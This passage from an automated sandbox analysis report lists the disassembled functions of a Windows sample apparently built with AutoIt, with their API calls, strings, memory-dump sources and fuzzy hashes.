Instruction ID: fd9afca356ebfd342083845dba7a6183260d33d0898db7e4a71f9f723e450766
Opcode Fuzzy Hash: 82f1e9d0554abafa536e8a70c5405e0ae66247bf15ed7c72b8b4806739251d7d
Instruction Fuzzy Hash: 0A113A71208B05DFD3308F19C880BA3B7E5EF84764F50C96EE9AA86A51D770F984CB60

Function 00B3072A Relevance: 1.5, APIs: 1, Instructions: 45COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00B307B0

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: LongNamePath
String ID:
API String ID: 82841172-0
Opcode ID: c91aa7fb30df4cae3a380dd7a9e5b42b5ffd6b54ac844adca0b0aab19c3f732b
Instruction ID: d2ac4287ba38ee475daf4ea95b14dcee0cc645a9a89e2d5060a611b64c9d69ff
Opcode Fuzzy Hash: c91aa7fb30df4cae3a380dd7a9e5b42b5ffd6b54ac844adca0b0aab19c3f732b
Instruction Fuzzy Hash: 5DF02B375412145FE3219E18AC02BF5B7DEDF89F20B14416FFD84D3E80C9116C0686D1

Function 00B34863 Relevance: 1.5, APIs: 1, Instructions: 36COMMON

Download Yara Rule

APIs

__lock_file.LIBCMT ref: 00B348A6

Part of subcall function 00B38B28: __getptd_noexit.LIBCMT ref: 00B38B28

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: __getptd_noexit__lock_file
String ID:
API String ID: 2597487223-0
Opcode ID: d641351b4e3465e4320897635350a9de236617597fe34f84f41116704e88e1bb
Instruction ID: a9e711372a2dfab85e7c613f295693844a3dc374edca1dafe65e6e0c97d92b20
Opcode Fuzzy Hash: d641351b4e3465e4320897635350a9de236617597fe34f84f41116704e88e1bb
Instruction Fuzzy Hash: 99F0CD31901709EBEF11AFB48C067AE37E0EF01329F358598F424AA191DBB89A51DB52

Function 00B14E4A Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,?,00BD52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00B14E7E

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: 183781c0d43a63daee924c671d7d3e469f2251d5d438ed7fa8bbdb713740dc2a
Instruction ID: fe2e4486788edb54c2e419407f8b0572616cc98f36d550c88ec7e7db98d2d8b4
Opcode Fuzzy Hash: 183781c0d43a63daee924c671d7d3e469f2251d5d438ed7fa8bbdb713740dc2a
Instruction Fuzzy Hash: FDF03076501711CFCB389F64E494852BBE1FF1433536089BEE1D782610C7319880DF80

Function 00B30791 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00B307B0

Part of subcall function 00B17BCC: _memmove.LIBCMT ref: 00B17C06

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: LongNamePath_memmove
String ID:
API String ID: 2514874351-0
Opcode ID: 2544e1f42487e9f95ad129f3aedd964782e490350f7dcea40d36d39a9aac0257
Instruction ID: 5e6db6fcb0447de7424995b947c4180d4ebb140a2fef22b3b1ed0da59a2d7a28
Opcode Fuzzy Hash: 2544e1f42487e9f95ad129f3aedd964782e490350f7dcea40d36d39a9aac0257
Instruction Fuzzy Hash: 52E0863694412857C72096589C05FEA77EDDB896A0F0441F6FC08D7205DD609D808690

Function 00B78E9F Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

__fread_nolock.LIBCMT ref: 00B78EC1

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: __fread_nolock
String ID:
API String ID: 2638373210-0
Opcode ID: 36e66934677415102e9643fee0822ecf6e22e0db5db5ed1a6e3653ba213ae753
Instruction ID: eb27320bedf88483d1ac5bed5ce26336d57f494ba22aac76f78a1ebffd89c7ce
Opcode Fuzzy Hash: 36e66934677415102e9643fee0822ecf6e22e0db5db5ed1a6e3653ba213ae753
Instruction Fuzzy Hash: 19E092B0104B005BD7388A24D800BE377E1EB05304F00085DF2AAC3241EB6278418759

Function 00B15C4E Relevance: 1.5, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNELBASE(?,00000000,00000000,?,00000001,?,?,?,00B4DD42,?,?,00000000), ref: 00B15C5F

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 20283ff1d26883df61c1b1e9ccdf89dff9daf6514aeee9b593103eb456b3b3b9
Instruction ID: d7cd4688a05fbef1b11e4789d70791b2200ee3a816ac9ba31a2af08677c76819
Opcode Fuzzy Hash: 20283ff1d26883df61c1b1e9ccdf89dff9daf6514aeee9b593103eb456b3b3b9
Instruction Fuzzy Hash: 4AD0C77464020CBFE710DB80DC46FA9777CD705720F100195FD04A7290D6B27D508795

Function 00B3525B Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

__wfsopen.LIBCMT ref: 00B35266

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: __wfsopen
String ID:
API String ID: 197181222-0
Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
Instruction ID: b00a529008e992657be8e9d446c1bafec47ab4d2cc27fef88ce955723808cf28
Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
Instruction Fuzzy Hash: 31B0927A44020C77CE112A82EC02A4A3B5D9B41764F408060FB0C18162A673E6649A89

Function 00B51DE4 Relevance: 1.5, APIs: 1, Instructions: 7COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?), ref: 00B51DF0

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: PathTemp
String ID:
API String ID: 2920410445-0
Opcode ID: ba7cb8be152834b2f025e142066876e9c5b9fe28fa94196ffa89bee80863d5c1
Instruction ID: 3b47766c8b2a088dc170fc3b63984929a1be3166d6887b362c32e262107aad9d
Opcode Fuzzy Hash: ba7cb8be152834b2f025e142066876e9c5b9fe28fa94196ffa89bee80863d5c1
Instruction Fuzzy Hash: 2FC048B186001A9BDB29AB58CDE5BB873BCAF14702F1040E6B606D20919AB01B88CE21

Function 00B7D07B Relevance: 1.4, APIs: 1, Instructions: 198COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000002,00000000), ref: 00B7D1FF

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: 4ae77c9d79417ff447294c41f98cd26eb45661ad508223e29f414dbb7925fd25
Instruction ID: fb0bd6b53426daf427980c98e1685e307c5fd47baed5d72609486dca66038545
Opcode Fuzzy Hash: 4ae77c9d79417ff447294c41f98cd26eb45661ad508223e29f414dbb7925fd25
Instruction Fuzzy Hash: 147153306083018FC714EF64C491AAAB7F4EF85394F5445ADF9AA973A2DB30ED45CB52

Function 00B30C08 Relevance: 1.3, APIs: 1, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE ref: 00B30CB7

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction ID: dadc786b1f1ef65a35cbc6e1dd76f256ed761936fccea9a5ac8c2b3571a0a9fd
Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction Fuzzy Hash: 4631B070A101059BC718EF58C4A4A69F7E6FF59300FB4A6E5E80ACB352DA31EDD1DB80

Function 0410229C Relevance: 1.3, APIs: 1, Instructions: 21sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000001F4), ref: 041022B1

Memory Dump Source

Source File: 00000000.00000002.1376585678.0000000004100000.00000040.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4100000_AuKUol8SPU.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
Instruction ID: 9cba2143e9146026b16fb56370946a92fd83d0b20be9165edb769e551e87929b
Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
Instruction Fuzzy Hash: F0E09A7494010EAFDB00EFE4D5496DE7BB4EF04311F1045A1FD0597680DB709E548A62

Function 041022A0 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000001F4), ref: 041022B1

Memory Dump Source

Source File: 00000000.00000002.1376585678.0000000004100000.00000040.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4100000_AuKUol8SPU.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction ID: e9dfaa153c38e3c9bd4117ae18a7a335271ef721f894aea5b5d7140775412238
Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction Fuzzy Hash: 04E0BF7494010E9FDB00EFE4D54969E7BB4EF04301F1045A1FD0592280D7709D508A62

Non-executed Functions

Function 00B9CABC Relevance: 75.9, APIs: 40, Strings: 3, Instructions: 632windowkeyboardCOMMON

Download Yara Rule

APIs

Part of subcall function 00B12612: GetWindowLongW.USER32(?,000000EB), ref: 00B12623

DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 00B9CB37
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00B9CB95
GetWindowLongW.USER32(?,000000F0), ref: 00B9CBD6
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00B9CC00
SendMessageW.USER32 ref: 00B9CC29
_wcsncpy.LIBCMT ref: 00B9CC95
GetKeyState.USER32(00000011), ref: 00B9CCB6
GetKeyState.USER32(00000009), ref: 00B9CCC3
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00B9CCD9
GetKeyState.USER32(00000010), ref: 00B9CCE3
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00B9CD0C
SendMessageW.USER32 ref: 00B9CD33
SendMessageW.USER32(?,00001030,?,00B9B348), ref: 00B9CE37
ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 00B9CE4D
ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00B9CE60
SetCapture.USER32(?), ref: 00B9CE69
ClientToScreen.USER32(?,?), ref: 00B9CECE
ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 00B9CEDB
InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00B9CEF5
ReleaseCapture.USER32 ref: 00B9CF00
GetCursorPos.USER32(?), ref: 00B9CF3A
ScreenToClient.USER32(?,?), ref: 00B9CF47
SendMessageW.USER32(?,00001012,00000000,?), ref: 00B9CFA3
SendMessageW.USER32 ref: 00B9CFD1
SendMessageW.USER32(?,00001111,00000000,?), ref: 00B9D00E
SendMessageW.USER32 ref: 00B9D03D
SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00B9D05E
SendMessageW.USER32(?,0000110B,00000009,?), ref: 00B9D06D
GetCursorPos.USER32(?), ref: 00B9D08D
ScreenToClient.USER32(?,?), ref: 00B9D09A
GetParent.USER32(?), ref: 00B9D0BA
SendMessageW.USER32(?,00001012,00000000,?), ref: 00B9D123
SendMessageW.USER32 ref: 00B9D154
ClientToScreen.USER32(?,?), ref: 00B9D1B2
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00B9D1E2
SendMessageW.USER32(?,00001111,00000000,?), ref: 00B9D20C
SendMessageW.USER32 ref: 00B9D22F
ClientToScreen.USER32(?,?), ref: 00B9D281
TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00B9D2B5

Part of subcall function 00B125DB: GetWindowLongW.USER32(?,000000EB), ref: 00B125EC

GetWindowLongW.USER32(?,000000F0), ref: 00B9D351

Strings

@GUI_DRAGID, xrefs: 00B9CE9C
@U=u, xrefs: 00B9CB95, 00B9CC00, 00B9CC29, 00B9CCD9, 00B9CD0C, 00B9CD33, 00B9CE37, 00B9CFA3, 00B9CFD1, 00B9D00E, 00B9D03D, 00B9D123, 00B9D154, 00B9D20C, 00B9D22F
F, xrefs: 00B9D235

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
String ID: @GUI_DRAGID$@U=u$F
API String ID: 3977979337-1007936534
Opcode ID: 71a669aa2a280f472b9d6676b29507fcdc7417b01984d58922f6f485bd93049f
Instruction ID: 54e5fc29a260294f985fba6a5307c0dec1cf18709471d379f2beb41f80a8fd40
Opcode Fuzzy Hash: 71a669aa2a280f472b9d6676b29507fcdc7417b01984d58922f6f485bd93049f
Instruction Fuzzy Hash: C442AA34204345AFDB20CF28C984AAABFE5FF49350F1405AAF695C72B0DB31E851DB92

Function 00B26F9E Relevance: 48.8, APIs: 19, Strings: 6, Instructions: 5018COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00B271C3
_memset.LIBCMT ref: 00B27539
_memmove.LIBCMT ref: 00B276AC

Strings

[:>:]], xrefs: 00B27492
DEFINE, xrefs: 00B62103
[:<:]], xrefs: 00B27479
\b(?<=\w), xrefs: 00B63773
Q\E, xrefs: 00B27FCB
\b(?=\w), xrefs: 00B63769

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: _memmove$_memset
String ID: DEFINE$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)
API String ID: 1357608183-1798697756
Opcode ID: a85a43b65f206826b93550b3e8512ab11f486a11b0217672d477d12809386b39
Instruction ID: 1b0de84b8a9c4e6aedbb8acac0ebbbbca00e9d70d7dd84fcbd3216dad7c4b4b5
Opcode Fuzzy Hash: a85a43b65f206826b93550b3e8512ab11f486a11b0217672d477d12809386b39
Instruction Fuzzy Hash: B793A271E44219DBDB24CF98D881BADB7F1FF48710F2481AAE949AB380E7749D81CB54

Function 00B148D7 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 131keyboardthreadwindowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(00000000,?), ref: 00B148DF
FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00B4D665
IsIconic.USER32(?), ref: 00B4D66E
ShowWindow.USER32(?,00000009), ref: 00B4D67B
SetForegroundWindow.USER32(?), ref: 00B4D685
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00B4D69B
GetCurrentThreadId.KERNEL32 ref: 00B4D6A2
GetWindowThreadProcessId.USER32(?,00000000), ref: 00B4D6AE
AttachThreadInput.USER32(?,00000000,00000001), ref: 00B4D6BF
AttachThreadInput.USER32(?,00000000,00000001), ref: 00B4D6C7
AttachThreadInput.USER32(00000000,?,00000001), ref: 00B4D6CF
SetForegroundWindow.USER32(?), ref: 00B4D6D2
MapVirtualKeyW.USER32(00000012,00000000), ref: 00B4D6E7
keybd_event.USER32(00000012,00000000), ref: 00B4D6F2
MapVirtualKeyW.USER32(00000012,00000000), ref: 00B4D6FC
keybd_event.USER32(00000012,00000000), ref: 00B4D701
MapVirtualKeyW.USER32(00000012,00000000), ref: 00B4D70A
keybd_event.USER32(00000012,00000000), ref: 00B4D70F
MapVirtualKeyW.USER32(00000012,00000000), ref: 00B4D719
keybd_event.USER32(00000012,00000000), ref: 00B4D71E
SetForegroundWindow.USER32(?), ref: 00B4D721
AttachThreadInput.USER32(?,?,00000000), ref: 00B4D748

Strings

Shell_TrayWnd, xrefs: 00B4D660

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
String ID: Shell_TrayWnd
API String ID: 4125248594-2988720461
Opcode ID: 64ff6cf5c71615f6d745e596856bda1741340ccf914efc87d40be415b12c0745
Instruction ID: 26fe8b65f79d271fd803b6049d0129e5149efdf2fe9b4635cad47d0565105a31
Opcode Fuzzy Hash: 64ff6cf5c71615f6d745e596856bda1741340ccf914efc87d40be415b12c0745
Instruction Fuzzy Hash: B1318771A403187BEB205FA19D89F7F7FACEB44B60F114066FA04EB1D1CAB05D10EAA0

Function 00B68310 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 224COMMON

Download Yara Rule

APIs

Part of subcall function 00B687E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00B6882B
Part of subcall function 00B687E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00B68858
Part of subcall function 00B687E1: GetLastError.KERNEL32 ref: 00B68865

_memset.LIBCMT ref: 00B68353
DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00B683A5
CloseHandle.KERNEL32(?), ref: 00B683B6
OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00B683CD
GetProcessWindowStation.USER32 ref: 00B683E6
SetProcessWindowStation.USER32(00000000), ref: 00B683F0
OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00B6840A

Part of subcall function 00B681CB: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00B68309), ref: 00B681E0
Part of subcall function 00B681CB: CloseHandle.KERNEL32(?,?,00B68309), ref: 00B681F2

Strings

winsta0, xrefs: 00B683C8
default, xrefs: 00B68405
, xrefs: 00B68362

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
String ID: $default$winsta0
API String ID: 2063423040-1027155976
Opcode ID: 34a8c569eaa22cb34caadd208783249fdbf32144cbb666178c703bb58e685ed4
Instruction ID: ec7055104cdd131737adcef8b25e36c2e63df369def75b76b7251fab2556f563
Opcode Fuzzy Hash: 34a8c569eaa22cb34caadd208783249fdbf32144cbb666178c703bb58e685ed4
Instruction Fuzzy Hash: CD816A72900209AFDF119FA4CD45AFE7BB8FF18314F1442AAF915A6261DB398E14DB20

Function 00B7C75C Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 280timefileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 00B7C78D
FindClose.KERNEL32(00000000), ref: 00B7C7E1
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00B7C806
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00B7C81D
FileTimeToSystemTime.KERNEL32(?,?), ref: 00B7C844
__swprintf.LIBCMT ref: 00B7C890
__swprintf.LIBCMT ref: 00B7C8D3

Part of subcall function 00B17DE1: _memmove.LIBCMT ref: 00B17E22

__swprintf.LIBCMT ref: 00B7C927

Part of subcall function 00B33698: __woutput_l.LIBCMT ref: 00B336F1

__swprintf.LIBCMT ref: 00B7C975

Part of subcall function 00B33698: __flsbuf.LIBCMT ref: 00B33713
Part of subcall function 00B33698: __flsbuf.LIBCMT ref: 00B3372B

__swprintf.LIBCMT ref: 00B7C9C4
__swprintf.LIBCMT ref: 00B7CA13
__swprintf.LIBCMT ref: 00B7CA62

Strings

%02d, xrefs: 00B7C91B, 00B7C925, 00B7C973, 00B7C9C2, 00B7CA11, 00B7CA60
